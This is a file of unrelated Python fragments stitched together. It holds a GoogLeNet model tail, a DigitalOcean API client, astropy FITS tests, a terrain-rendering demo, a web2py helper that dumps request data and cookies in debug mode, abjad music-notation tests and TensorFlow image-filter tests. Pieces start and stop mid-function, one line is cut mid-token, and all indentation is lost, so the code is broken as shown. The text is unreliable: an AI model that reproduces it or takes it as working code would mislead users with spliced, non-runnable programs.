self.e4 = Inception(528, 256, 160, 320, 32, 128, 128)
self.a5 = Inception(832, 256, 160, 320, 32, 128, 128)
self.b5 = Inception(832, 384, 192, 384, 48, 128, 128)
self.avgpool = nn.AvgPool2d(8, stride=1)
self.linear = nn.Linear(1024, 10)
def forward(self, x):
out = self.pre_layers(x)
out = self.a3(out)
out = self.b3(out)
out = self.maxpool(out)
out = self.a4(out)
out = self.b4(out)
out = self.c4(out)
out = self.d4(out)
        out = self.e4(out)
out = self.maxpool(out)
out = self.a5(out)
out = self.b5(out)
out = self.avgpool(out)
out = out.view(out.size(0), -1)
out = self.linear(out)
return out
# net = GoogLeNet()
# x = torch.randn(1,3,32,32)
# y = net(Variable(x))
# print(y.size())
        json = self.request('/droplets/')
return json['droplets']
def new_droplet(self, name, size_id, image_id, region_id,
ssh_key_ids=None, virtio=False, private_networking=False,
backups_enabled=False):
params = {
'name': name,
'size_id': size_id,
'image_id': image_id,
'region_id': region_id,
'virtio': virtio,
'private_networking': private_networking,
'backups_enabled': backups_enabled,
}
if ssh_key_ids:
params['ssh_key_ids'] = ssh_key_ids
json = self.request('/droplets/new', params=params)
return json['droplet']
def show_droplet(self, id):
json = self.request('/droplets/%s' % id)
return json['droplet']
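# The droplet action endpoints below all return the API's event payload;
# the redundant 'status' field is popped before the JSON is handed back.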
def reboot_droplet(self, id):
json = self.request('/droplets/%s/reboot/' % id)
json.pop('status', None)
return json
def power_cycle_droplet(self, id):
json = self.request('/droplets/%s/power_cycle/' % id)
json.pop('status', None)
return json
def shutdown_droplet(self, id):
json = self.request('/droplets/%s/shutdown/' % id)
json.pop('status', None)
return json
def power_off_droplet(self, id):
json = self.request('/droplets/%s/power_off/' % id)
json.pop('status', None)
return json
def power_on_droplet(self, id):
json = self.request('/droplets/%s/power_on/' % id)
json.pop('status', None)
return json
def password_reset_droplet(self, id):
json = self.request('/droplets/%s/password_reset/' % id)
json.pop('status', None)
return json
def resize_droplet(self, id, size_id):
params = {'size_id': size_id}
json = self.request('/droplets/%s/resize/' % id, params)
json.pop('status', None)
return json
def snapshot_droplet(self, id, name):
params = {'name': name}
json = self.request('/droplets/%s/snapshot/' % id, params)
json.pop('status', None)
return json
def restore_droplet(self, id, image_id):
params = {'image_id': image_id}
json = self.request('/droplets/%s/restore/' % id, params)
json.pop('status', None)
return json
def rebuild_droplet(self, id, image_id):
params = {'image_id': image_id}
json = self.request('/droplets/%s/rebuild/' % id, params)
json.pop('status', None)
return json
def enable_backups_droplet(self, id):
json = self.request('/droplets/%s/enable_backups/' % id)
json.pop('status', None)
return json
def disable_backups_droplet(self, id):
json = self.request('/droplets/%s/disable_backups/' % id)
json.pop('status', None)
return json
def rename_droplet(self, id, name):
params = {'name': name}
json = self.request('/droplets/%s/rename/' % id, params)
json.pop('status', None)
return json
def destroy_droplet(self, id, scrub_data=True):
params = {'scrub_data': '1' if scrub_data else '0'}
json = self.request('/droplets/%s/destroy/' % id, params)
json.pop('status', None)
return json
#regions==========================================
def all_regions(self):
json = self.request('/regions/')
return json['regions']
#images==========================================
def all_images(self, filter='global'):
params = {'filter': filter}
json = self.request('/images/', params)
return json['images']
def show_image(self, image_id):
params = {'image_id': image_id}
json = self.request('/images/%s/' % image_id, params)
return json['image']
def destroy_image(self, image_id):
self.request('/images/%s/destroy' % image_id)
return True
def transfer_image(self, image_id, region_id):
params = {'region_id': region_id}
json = self.request('/images/%s/transfer/' % image_id, params)
json.pop('status', None)
return json
#ssh_keys=========================================
def all_ssh_keys(self):
json = self.request('/ssh_keys/')
return json['ssh_keys']
def new_ssh_key(self, name, pub_key):
params = {'name': name, 'ssh_pub_key': pub_key}
json = self.request('/ssh_keys/new/', params)
return json['ssh_key']
def show_ssh_key(self, key_id):
json = self.request('/ssh_keys/%s/' % key_id)
return json['ssh_key']
def edit_ssh_key(self, key_id, name, pub_key):
params = {'name': name, 'ssh_pub_key': pub_key} # the doc needs to be improved
json = self.request('/ssh_keys/%s/edit/' % key_id, params)
return json['ssh_key']
def destroy_ssh_key(self, key_id):
self.request('/ssh_keys/%s/destroy/' % key_id)
return True
#sizes============================================
def sizes(self):
json = self.request('/sizes/')
return json['sizes']
#domains==========================================
def all_domains(self):
json = self.request('/domains/')
return json['domains']
def new_domain(self, name, ip):
params = {
'name': name,
'ip_address': ip
}
json = self.request('/domains/new/', params)
return json['domain']
def show_domain(self, domain_id):
json = self.request('/domains/%s/' % domain_id)
return json['domain']
def destroy_domain(self, domain_id):
self.request('/domains/%s/destroy/' % domain_id)
return True
def all_domain_records(self, domain_id):
json = self.request('/domains/%s/records/' % domain_id)
return json['records']
def new_domain_record(self, domain_id, record_type, data, name=None, priority=None, port=None, weight=None):
params = {
'record_type': record_type,
'data': data,
}
if name: params['name'] = name
if priority: params['priority'] = priority
if port: params['port'] = port
if weight: params['weight'] = weight
json = self.request('/domains/%s/records/new/' % domain_id, params)
return json['domain_record'] if 'domain_record' in json else json['record'] # DO API docs say 'domain_record', but the response actually contains 'record'
def show_domain_record(self, domain_id, record_id):
json = self.request('/domains/%s/records/%s' % (domain_id, record_id))
return json['record']
def edit_domain_record(self, domain_id, record_id, record_type, data, name=None, priority=None, port=None, weight=None):
params = {
'record_type': record_type,
'data': data,
}
if name: params['name'] = name
if priority: params['priority'] = priority
if port: params['port'] = port
if weight: params['weight'] = weight
json = self.request('/domains/%s/records/%s/edit/' % (domain_id, record_id), params)
return json['domain_record'] if 'domain_record' in json else json['record'] # DO API docs say 'domain_record' for /new/ but 'record' for /edit/.
def destroy_domain_record(self, domain_id, record_id):
self.request('/domains/%s/records/%s/destroy/' % (domain_id, record_id))
return True
#events===========================================
def show_event(self, event_id):
json = self.request('/events/%s' % event_id)
return json['event']
#low_level========================================
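# Every public method funnels through request(), which attaches the account
# credentials as query parameters and issues a GET against API_ENDPOINT + path.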
def request(self, path, params=None, method='GET'):
# copy to avoid mutating the caller's dict or a shared mutable default
params = dict(params or {})
params['client_id'] = self.client_id
params['api_key'] = self.api_key
if not path.startswith('/'):
path = '/'+path
url = API_ENDPOINT+path
try:
resp = requests.get(url, params=params, timeout=60)
json = resp.json()
except ValueError: # requests.models.json.JSONDecodeError
raise ValueError("The API server doesn't respond with a valid json")
e(0, 1, 7000)
arr[1] = np.random.normal(size=7000)
hdu = fits.CompImageHDU(data=arr)
hdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as hdul:
comp_hdu = hdul[1]
# GZIP-compressed tile should compare exactly
assert np.all(comp_hdu.data[0] == arr[0])
# The second tile uses lossy compression and may be somewhat off,
# so we don't bother comparing it exactly
def test_duplicate_compression_header_keywords(self):
"""
Regression test for https://github.com/astropy/astropy/issues/2750
Tests that the fake header (for the compressed image) can still be read
even if the real header contained a duplicate ZTENSION keyword (the
issue applies to any keyword specific to the compression convention,
however).
"""
arr = np.arange(100, dtype=np.int32)
hdu = fits.CompImageHDU(data=arr)
header = hdu._header
# append the duplicate keyword
hdu._header.append(('ZTENSION', 'IMAGE'))
hdu.writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits')) as hdul:
assert header == hdul[1]._header
# There's no good reason to have a duplicate keyword, but
# technically it isn't invalid either :/
assert hdul[1]._header.count('ZTENSION') == 2
def test_scale_bzero_with_compressed_int_data(self):
"""
Regression test for https://github.com/astropy/astropy/issues/4600
and https://github.com/astropy/astropy/issues/4588
Identical to test_scale_bzero_with_int_data() but uses a compressed
image.
"""
a = np.arange(100, 200, dtype=np.int16)
hdu1 = fits.CompImageHDU(data=a.copy())
hdu2 = fits.CompImageHDU(data=a.copy())
# Previously the following line would throw a TypeError,
# now it should be identical to the integer bzero case
hdu1.scale('int16', bzero=99.0)
hdu2.scale('int16', bzero=99)
assert np.allclose(hdu1.data, hdu2.data)
def test_scale_back_compressed_uint_assignment(self):
"""
Extend fix for #4600 to assignment to data
Identical to test_scale_back_uint_assignment() but uses a compressed
image.
Suggested by:
https://github.com/astropy/astropy/pull/4602#issuecomment-208713748
"""
a = np.arange(100, 200, dtype=np.uint16)
fits.CompImageHDU(a).writeto(self.temp('test.fits'))
with fits.open(self.temp('test.fits'), mode="update",
scale_back=True) as hdul:
hdul[1].data[:] = 0
assert np.allclose(hdul[1].data, 0)
def test_compressed_header_missing_znaxis(self):
a = np.arange(100, 200, dtype=np.uint16)
comp_hdu = fits.CompImageHDU(a)
comp_hdu._header.pop('ZNAXIS')
with pytest.raises(KeyError):
comp_hdu.compressed_data
comp_hdu = fits.CompImageHDU(a)
comp_hdu._header.pop('ZBITPIX')
with pytest.raises(KeyError):
comp_hdu.compressed_data
@pytest.mark.parametrize(
('keyword', 'dtype', 'expected'),
[('BSCALE', np.uint8, np.float32), ('BSCALE', np.int16, np.float32),
('BSCALE', np.int32, np.float64), ('BZERO', np.uint8, np.float32),
('BZERO', np.int16, np.float32), ('BZERO', np.int32, np.float64)])
def test_compressed_scaled_float(self, keyword, dtype, expected):
"""
If BSCALE,BZERO is set to floating point values, the image
should be floating-point.
https://github.com/astropy/astropy/pull/6492
Parameters
----------
keyword : `str`
Keyword to set to a floating-point value to trigger
floating-point pixels.
dtype : `numpy.dtype`
Type of original array.
expected : `numpy.dtype`
Expected type of uncompressed array.
"""
value = 1.23345 # A floating-point value
hdu = fits.CompImageHDU(np.arange(0, 10, dtype=dtype))
hdu.header[keyword] = value
hdu.writeto(self.temp('test.fits'))
del hdu
with fits.open(self.temp('test.fits')) as hdu:
assert hdu[1].header[keyword] == value
assert hdu[1].data.dtype == expected
@pytest.mark.parametrize('dtype', (np.uint8, np.int16, np.uint16, np.int32,
np.uint32))
def test_compressed_integers(self, dtype):
"""Test that the various integer dtypes are correctly written and read.
Regression test for https://github.com/astropy/astropy/issues/9072
"""
mid = np.iinfo(dtype).max // 2
data = np.arange(mid-50, mid+50, dtype=dtype)
testfile = self.temp('test.fits')
hdu = fits.CompImageHDU(data=data)
hdu.writeto(testfile, overwrite=True)
new = fits.getdata(testfile)
np.testing.assert_array_equal(data, new)
def test_comphdu_bscale(tmpdir):
"""
Regression test for a bug that caused extensions that used BZERO and BSCALE
that got turned into CompImageHDU to end up with BZERO/BSCALE before the
TFIELDS.
"""
filename1 = tmpdir.join('3hdus.fits').strpath
filename2 = tmpdir.join('3hdus_comp.fits').strpath
x = np.random.random((100, 100))*100
x0 = fits.PrimaryHDU()
x1 = fits.ImageHDU(np.array(x-50, dtype=int), uint=True)
x1.header['BZERO'] = 20331
x1.header['BSCALE'] = 2.3
hdus = fits.HDUList([x0, x1])
hdus.writeto(filename1)
# fitsverify (based on cfitsio) should fail on this file, only seeing the
# first HDU.
with fits.open(filename1) as hdus:
hdus[1] = fits.CompImageHDU(data=hdus[1].data.astype(np.uint32),
header=hdus[1].header)
hdus.writeto(filename2)
# open again and verify
with fits.open(filename2) as hdus:
hdus[1].verify('exception')
def test_scale_implicit_casting():
# Regression test for an issue that occurred because Numpy now does not
# allow implicit type casting during inplace operations.
hdu = fits.ImageHDU(np.array([1], dtype=np.int32))
hdu.scale(bzero=1.3)
def test_bzero_implicit_casting_compressed():
# Regression test for an issue that occurred because Numpy now does not
# allow implicit type casting during inplace operations. Astropy is
# actually not able to produce a file that triggers the failure - the
# issue occurs when using unsigned integer types in the FITS file, in which
# case BZERO should be 32768. But if the keyword is stored as 32768.0, then
# it was possible to trigger the implicit casting error.
filename = os.path.join(os.path.dirname(__file__),
'data', 'compressed_float_bzero.fits')
with fits.open(filename) as hdul:
hdu = hdul[1]
hdu.data
def test_bzero_mishandled_info(tmpdir):
# Regression test for #5507:
# Calling HDUList.info() on a dataset which applies a zeropoint
# from BZERO but which astropy.io.fits does not think it needs
# to resize to a new dtype results in an AttributeError.
filename = tmpdir.join('floatimg_with_bzero.fits').strpath
hdu = fits.ImageHDU(np.zeros((10, 10)))
hdu.header['BZERO'] = 10
hdu.writeto(filename, overwrite=True)
with fits.open(filename) as hdul:
hdul.info()
def test_image_write_readonly(tmpdir):
# Regression test to make sure that we can write out read-only arrays (#5512)
x = np.array([1, 2, 3])
x.setflags(write=False)
ghdu = fits.ImageHDU(data=x)
ghdu.add_datasum()
filename = tmpdir.join('test.fits').strpath
ghdu.writeto(filename)
with fits.open(filename) as hdulist:
assert_equal(hdulist[1].data, [1, 2, 3])
# Same for compressed HDU
x = np.array([1.0, 2.0, 3.0])
x.setflags(write=False)
ghdu = fits.CompImageHDU(data=x)
# add_datasum does not work for CompImageHDU
# ghdu.add_datasum()
filename = tmpdir.join('test2.fits').strpath
ghdu.writeto(filename)
# -*- coding: utf-8 -*-
# Copyright (c) 2017, sathishpy@gmail.com and Contributors
# See license.txt
from __future__ import unicode_literals
import frappe
import unittest
class TestCMPaperManagement(unittest.TestCase):
pass
from collections import defaultdict
import colorsys
import pg
def noise(x, z):
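# Low-frequency octave (a) sets the base elevation, rescaled from [-1, 1]
# to roughly [0, 32]; high-frequency octave (b) adds small surface detail.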
a = pg.simplex2(-x * 0.01, -z * 0.01, 4)
b = pg.simplex2(x * 0.1, z * 0.1, 4)
return (a + 1) * 16 + b / 10
def generate_color(x, z):
m = 0.005
h = (pg.simplex2(x * m, z * m, 4) + 1) / 2
s = (pg.simplex2(-x * m, z * m, 4) + 1) / 2
v = (pg.simplex2(x * m, -z * m, 4) + 1) / 2
v = v * 0.5 + 0.5
return colorsys.hsv_to_rgb(h, s, v)
class Window(pg.Window):
def setup(self):
self.wasd = pg.WASD(self, speed=30)
self.wasd.look_at((-20, 20, -8), (0, 0, 0))
self.context = pg.Context(pg.DirectionalLightProgram())
self.context.use_color = True
self.context.specular_power = 8.0
self.context.specular_multiplier = 0.3
normals = defaultdict(list)
position = []
normal = []
color = []
size = 50
# generate height map
height = {}
colors = {}
for x in xrange(-size, size + 1):
for z in xrange(-size, size + 1):
height[(x, z)] = noise(x, z)
colors[(x, z)] = generate_color(x, z)
# generate triangles and track normals for all vertices
for x in xrange(-size, size):
for z in xrange(-size, size):
t1 = [x + 0, z + 0, x + 1, z + 0, x + 0, z + 1]
t2 = [x + 0, z + 1, x + 1, z + 0, x + 1, z + 1]
for t in [t1, t2]:
x1, z1, x2, z2, x3, z3 = t
p1 = (x1, height[(x1, z1)], z1)
p2 = (x2, height[(x2, z2)], z2)
p3 = (x3, height[(x3, z3)], z3)
c1 = colors[(x1, z1)]
c2 = colors[(x2, z2)]
c3 = colors[(x3, z3)]
position.extend([p3, p2, p1])
color.extend([c3, c2, c1])
n = pg.normalize(pg.cross(pg.sub(p3, p1), pg.sub(p2, p1)))
normals[(x1, z1)].append(n)
normals[(x2, z2)].append(n)
normals[(x3, z3)].append(n)
# compute average normal for all vertices
for key, value in normals.items():
normals[key] = pg.normalize(reduce(pg.add, value))
for x, y, z in position:
normal.append(normals[(x, z)])
# generate vertex buffer
vb = pg.VertexBuffer(pg.interleave(position, normal, color))
self.context.position, self.context.normal, self.context.color = (
vb.slices(3, 3, 3))
def update(self, t, dt):
matrix = pg.Matrix()
matrix = self.wasd.get_matrix(matrix)
matrix = matrix.perspective(65, self.aspect, 0.1, 1000)
self.context.matrix = matrix
self.context.camera_position = self.wasd.position
def draw(self):
self.clear()
self.context.draw()
if __name__ == "__main__":
pg.run(Window)
#!/usr/bin/env python
import os
import json
class TermiteCore:
def __init__( self, request, response ):
self.request = request
self.response = response
def GetConfigs( self ):
def GetServer():
return self.request.env['HTTP_HOST']
def GetDataset():
return self.request.application
def GetModel():
return self.request.controller
def GetAttribute():
return self.request.function
def GetDatasets( dataset ):
FOLDER_EXCLUSIONS = frozenset( [ 'admin', 'examples', 'welcome', 'init' ] )
applications_parent = self.request.env['applications_parent']
applications_path = '{}/applications'.format( applications_parent )
folders = []
for folder in os.listdir( applications_path ):
applications_subpath = '{}/{}'.format( applications_path, folder )
if os.path.isdir( applications_subpath ):
if folder not in FOLDER_EXCLUSIONS:
folders.append( folder )
folders = sorted( folders )
return folders
def GetModels( dataset, model ):
if dataset == 'init':
return None
app_data_path = '{}/data'.format( self.request.folder )
folders = []
for folder in os.listdir( app_data_path ):
app_data_subpath = '{}/{}'.format( app_data_path, folder )
if os.path.isdir( app_data_subpath ):
folders.append( folder )
folders = sorted( folders )
return folders
def GetAttributes( dataset, model, attribute ):
if dataset == 'init':
return None
if model == 'default':
return None
if model == 'lda':
return [
'DocIndex',
'TermIndex',
'TopicIndex',
'TermTopicMatrix',
'DocTopicMatrix',
'TopicCooccurrence'
]
elif model == 'corpus':
return [
'DocMeta',
'TermFreqs',
'TermCoFreqs'
]
else:
return []
server = GetServer()
dataset = GetDataset()
datasets = GetDatasets( dataset )
model = GetModel()
models = GetModels( dataset, model )
attribute = GetAttribute()
attributes = GetAttributes( dataset, model, attribute )
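# Bundle the current selection (server/dataset/model/attribute) together
# with the available alternatives so a client can render navigation.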
configs = {
'server' : server,
'dataset' : dataset,
'datasets' : datasets,
'model' : model,
'models' : models,
'attribute' : attribute,
'attributes' : attributes
}
return configs
def IsDebugMode( self ):
return 'debug' in self.request.vars
def IsJsonFormat( self ):
return 'format' in self.request.vars and 'json' == self.request.vars['format'].lower()
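# Dispatch: with ?debug in the query string, dump the request environment;
# otherwise wrap params and configs, honoring ?format=json for raw JSON.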
def GenerateResponse( self, params = {}, keysAndValues = {} ):
if self.IsDebugMode():
return self.GenerateDebugResponse()
else:
return self.GenerateNormalResponse( params, keysAndValues )
def GenerateDebugResponse( self ):
def GetEnv( env ):
data = {}
for key in env:
value = env[key]
if isinstance( value, ( dict, list, tuple, str, unicode, int, long, float ) ) or \
value is None or value is True or value is False:
data[ key ] = value
else:
data[ key ] = 'N/A'
return data
info = {
'env' : GetEnv( self.request.env ),
'cookies' : self.request.cookies,
'vars' : self.request.vars,
'get_vars' : self.request.get_vars,
'post_vars' : self.request.post_vars,
'folder' : self.request.folder,
'application' : self.request.application,
'controller' : self.request.controller,
'function' : self.request.function,
'args' : self.request.args,
'extension' : self.request.extension,
'now' : str( self.request.now )
}
return json.dumps( info, encoding = 'utf-8', indent = 2, sort_keys = True )
def GenerateNormalResponse( self, params, keysAndValues = {} ):
data = {
'params' : params,
'configs' : self.GetConfigs()
}
data.update( keysAndValues )
dataStr = json.dumps( data, encoding = 'utf-8', indent = 2, sort_keys = True )
# Workaround while we build up the server-client architecture
self.response.headers['Access-Control-Allow-Origin'] = 'http://' + self.request.env['REMOTE_ADDR'] + ':8080'
if self.IsJsonFormat():
return dataStr
else:
data[ 'content' ] = dataStr
return data
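# Hypothetical usage sketch from a web2py controller (argument names assumed,
# not part of this module):
# core = TermiteCore( request, response )
# return core.GenerateResponse( params = { 'searchText' : '' } )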
assert systemtools.TestManager.compare(
voice,
r'''
\new Voice \with {
\override NoteHead #'color = #red
} {
c'8
d'8
<<
\new Voice {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in voice.select_leaves(allow_discontiguous_leaves=True)]
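# Each anonymous voice is its own logical voice: the outer leaves (c'8, d'8,
# b'8, c''8) share one signature, and each inner voice gets another.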
assert signatures[0] == signatures[1]
assert signatures[0] != signatures[2]
assert signatures[0] != signatures[4]
assert signatures[0] == signatures[6]
assert signatures[2] == signatures[3]
assert signatures[2] != signatures[4]
def test_selectiontools_Parentage_logical_voice_05():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
voice = Voice(
r'''
c'8
d'8
<<
\context Voice = "foo" {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
'''
)
override(voice).note_head.color = 'red'
voice.name = 'foo'
assert systemtools.TestManager.compare(
voice,
r'''
\context Voice = "foo" \with {
\override NoteHead #'color = #red
} {
c'8
d'8
<<
\context Voice = "foo" {
e'8
f'8
}
\new Voice {
g'8
a'8
}
>>
b'8
c''8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in voice.select_leaves(allow_discontiguous_leaves=True)]
assert signatures[0] == signatures[1]
assert signatures[0] == signatures[2]
assert signatures[0] != signatures[4]
assert signatures[0] == signatures[6]
assert signatures[2] == signatures[0]
assert signatures[2] == signatures[3]
assert signatures[2] != signatures[4]
assert signatures[2] == signatures[6]
assert signatures[4] != signatures[0]
assert signatures[4] != signatures[2]
assert signatures[4] == signatures[5]
assert signatures[4] != signatures[6]
def test_selectiontools_Parentage_logical_voice_06():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
container = Container([
Staff([Voice("c'8 d'8")]),
Staff([Voice("e'8 f'8")]),
])
container[0].name = 'staff1'
container[1].name = 'staff2'
container[0][0].name = 'voicefoo'
container[1][0].name = 'voicefoo'
beam = Beam()
with pytest.raises(AssertionError):
attach(beam, container.select_leaves())
leaves = container.select_leaves(allow_discontiguous_leaves=True)
beam = Beam()
attach(beam, leaves[:2])
beam = Beam()
attach(beam, leaves[2:])
assert systemtools.TestManager.compare(
container,
r'''
{
\context Staff = "staff1" {
\context Voice = "voicefoo" {
c'8 [
d'8 ]
}
}
\context Staff = "staff2" {
\context Voice = "voicefoo" {
e'8 [
f'8 ]
}
}
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in leaves]
assert signatures[0] == signatures[1]
assert signatures[0] != signatures[2]
assert signatures[1] != signatures[2]
assert signatures[2] == signatures[3]
def test_selectiontools_Parentage_logical_voice_07():
r'''Returns logical voice giving the root and
first voice, staff and score in parentage of component.
'''
container = Container(
r'''
c'8
<<
\context Voice = "alto" {
d'8
}
\context Voice = "soprano" {
e'8
}
>>
{
\context Voice = "alto" {
f'8
}
\context Voice = "soprano" {
g'8
}
}
a'8
'''
)
override(container[1][1]).note_head.color = 'red'
override(container[2][1]).note_head.color = 'red'
assert systemtools.TestManager.compare(
container,
r'''
{
c'8
<<
\context Voice = "alto" {
d'8
}
\context Voice = "soprano" \with {
\override NoteHead #'color = #red
} {
e'8
}
>>
{
\context Voice = "alto" {
f'8
}
\context Voice = "soprano" \with {
\override NoteHead #'color = #red
} {
g'8
}
}
a'8
}
'''
)
signatures = [inspect_(leaf).get_parentage().logical_voice
for leaf in container.select_leaves(allow_discontiguous_leaves=True)]
assert signatures[0] != signatures[1]
assert signatures[0] != signatures[2]
assert signatures[0] != signatures[3]
assert signatures[0] != signatures[4]
assert signatures[0] == signatures[5]
assert signatures[1] != signatures[0]
assert signatures[1] != signatures[2]
assert signatures[1] == signatures[3]
assert signatures[1] != signatures[4]
assert signatures[1] != signatures[5]
assert signatures[2] != signatures[0]
assert signatures[2] != signatures[1]
assert signatures[2] != signatures[3]
assert signatures[2] == signatures[4]
assert signatures[2] != signatures[5]
def test_selectiontools_Parentage_logical_voice_08():
r'''Unicorporated leaves carry equivalent containment signatures.
'''
note_1 = Note(0, (1, 8))
note_2 = Note(0, (1, 8))
signature_1 = inspect_(note_1).get_parentage().logical_voice
signature_2 = inspect_(note_2).get_parentage().logical_voice
assert signature_1 == signature_2
def test_selectiontools_Parentage_logical_voice_09():
r'''Notes appear in the same logical voice.
'''
t1 = Staff([Voice([Note(0, (1, 8))])])
t1.name = 'staff'
t1[0].name = 'voice'
t2 = Staff([Voice([Note(0, (1, 8))])])
t2.name = 'staff'
t2[0].name = 'voice'
t1_leaf_signature = inspect_(t1.select_leaves()[0]).get_parentage().logical_voice
t2_leaf_signature = inspect_(t2.select_leaves()[0]).get_parentage().logical_voice
assert t1_leaf_signature == t2_leaf_signature
def test_selectiontools_Parentage_logical_voice_10():
r'''Measure and leaves must carry same logical voice signature.
'''
staff = Staff(r'''
{
\time 2/8
c'8
d'8
}
e'8
f'8
''')
assert systemtools.TestManager.compare(
staff,
r'''
\new Staff {
{
\time 2/8
c'8
d'8
}
e'8
f'8
}
'''
)
assert inspect_(staff[0]).get_parentage().logical_voice == \
inspect_(staff[-1]).get_parentage().logical_voice
assert inspect_(staff[0]).get_parentage().logical_voice == \
inspect_(staff[0][0]).get_parentage().logical_voice
assert inspect_(staff[0][0]).get_parentage().logical_voice == \
inspect_(staff[-1]).get_parentage().logical_voice
def test_selectiontools_Parentage_logical_voice_11():
r'''Leaves inside different staves have different logical voice
signatures, even when the staves have the same name.
'''
container = Container(2 * Staff("c'8 c'8"))
container[0].name = container[1].name = 'staff'
assert systemtools.TestManager.compare(
container,
r'''
{
\context Staff = "staff" {
c'8
c'8
}
plane = tf.constant(
[x for x in range(1, height * width + 1)], shape=(height, width), dtype=dtype
)
image = tile_image(plane, image_shape=image_shape)
result = filter2d_fn(
image,
filter_shape=filter_shape,
padding=padding,
constant_values=constant_values,
)
return result
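# verify_values tiles expected_plane across the requested image shape and
# checks the filtered output against it for every dtype in _dtypes_to_test.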
def verify_values(
filter2d_fn, image_shape, filter_shape, padding, constant_values, expected_plane
):
expected_output = tile_image(expected_plane, image_shape)
for dtype in _dtypes_to_test:
result = setup_values(
filter2d_fn, image_shape, filter_shape, padding, constant_values, dtype
)
np.testing.assert_allclose(
result.numpy(),
tf.dtypes.cast(expected_output, dtype).numpy(),
rtol=1e-02,
atol=1e-02,
)
def setUp(self):
self._filter2d_fn = mean_filter2d
super().setUp()
@pytest.mark.parametrize("image_shape", [(1,), (16, 28, 28, 1, 1)])
def test_invalid_image_mean(image_shape):
with pytest.raises((ValueError, tf.errors.InvalidArgumentError)):
image = tf.ones(shape=image_shape)
mean_filter2d(image)
@pytest.mark.parametrize("filter_shape", [(3, 3, 3), (3, None, 3)])
def test_invalid_filter_shape_mean(filter_shape):
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
mean_filter2d(image, filter_shape=filter_shape)
filter_shape = None
with pytest.raises(TypeError):
mean_filter2d(image, filter_shape=filter_shape)
def test_invalid_padding_mean():
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
mean_filter2d(image, padding="TEST")
def test_none_channels_mean():
# 3-D image
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(3, 3, None))
)
fn(tf.ones(shape=(3, 3, 1)))
fn(tf.ones(shape=(3, 3, 3)))
# 4-D image
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(1, 3, 3, None))
)
fn(tf.ones(shape=(1, 3, 3, 1)))
fn(tf.ones(shape=(1, 3, 3, 3)))
@pytest.mark.parametrize("shape", [(3, 3), (3, 3, 3), (1, 3, 3, 3)])
def test_unknown_shape_mean(shape):
fn = mean_filter2d.get_concrete_function(
tf.TensorSpec(shape=None, dtype=tf.dtypes.float32),
padding="CONSTANT",
constant_values=1.0,
)
image = tf.ones(shape=shape)
np.testing.assert_equal(image.numpy(), fn(image).numpy())
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[3.6666667, 4.0, 4.3333335],
[4.6666665, 5.0, 5.3333335],
[5.6666665, 6.0, 6.3333335],
]
)
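# Worked corner value: the base plane is [[1..3], [4..6], [7..9]]; with
# REFLECT padding the 3x3 window at (0, 0) holds [5, 4, 5, 2, 1, 2, 5, 4, 5],
# whose mean is 33 / 9 = 3.6666667.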
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_reflect_padding_with_4x4_filter_mean(image_shape):
expected_plane = tf.constant(
[
[5.0, 5.0, 5.0],
[5.0, 5.0, 5.0],
[5.0, 5.0, 5.0],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(4, 4),
padding="REFLECT",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_constant_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[1.3333334, 2.3333333, 1.7777778],
[3.0, 5.0, 3.6666667],
[2.6666667, 4.3333335, 3.1111112],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=0,
expected_plane=expected_plane,
)
expected_plane = tf.constant(
[
[1.8888888, 2.6666667, 2.3333333],
[3.3333333, 5.0, 4.0],
[3.2222223, 4.6666665, 3.6666667],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="CONSTANT",
constant_values=1,
expected_plane=expected_plane,
)
@pytest.mark.usefixtures("maybe_run_functions_eagerly")
@pytest.mark.parametrize("image_shape", _image_shapes_to_test)
def test_symmetric_padding_with_3x3_filter_mean(image_shape):
expected_plane = tf.constant(
[
[2.3333333, 3.0, 3.6666667],
[4.3333335, 5.0, 5.6666665],
[6.3333335, 7.0, 7.6666665],
]
)
verify_values(
mean_filter2d,
image_shape=image_shape,
filter_shape=(3, 3),
padding="SYMMETRIC",
constant_values=0,
expected_plane=expected_plane,
)
@pytest.mark.parametrize("image_shape", [(1,), (16, 28, 28, 1, 1)])
def test_invalid_image_median(image_shape):
with pytest.raises((ValueError, tf.errors.InvalidArgumentError)):
image = tf.ones(shape=image_shape)
median_filter2d(image)
@pytest.mark.parametrize("filter_shape", [(3, 3, 3), (3, None, 3)])
def test_invalid_filter_shape_median(filter_shape):
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
median_filter2d(image, filter_shape=filter_shape)
filter_shape = None
with pytest.raises(TypeError):
median_filter2d(image, filter_shape=filter_shape)
def test_invalid_padding_median():
image = tf.ones(shape=(1, 28, 28, 1))
with pytest.raises(ValueError):
median_filter2d(image, padding="TEST")
def test_none_channels_median():
# 3-D image
fn = median_filter2d.get_concrete_function(
tf.TensorSpec(dtype=tf.dtypes.float32, shape=(3, 3, None))
)
fn(tf.ones(shape=(3, 3, 1)))
fn(tf.ones(shape=(3, 3, 3)))
# 4-D image
fn = median_filter2d.get_concrete_function(
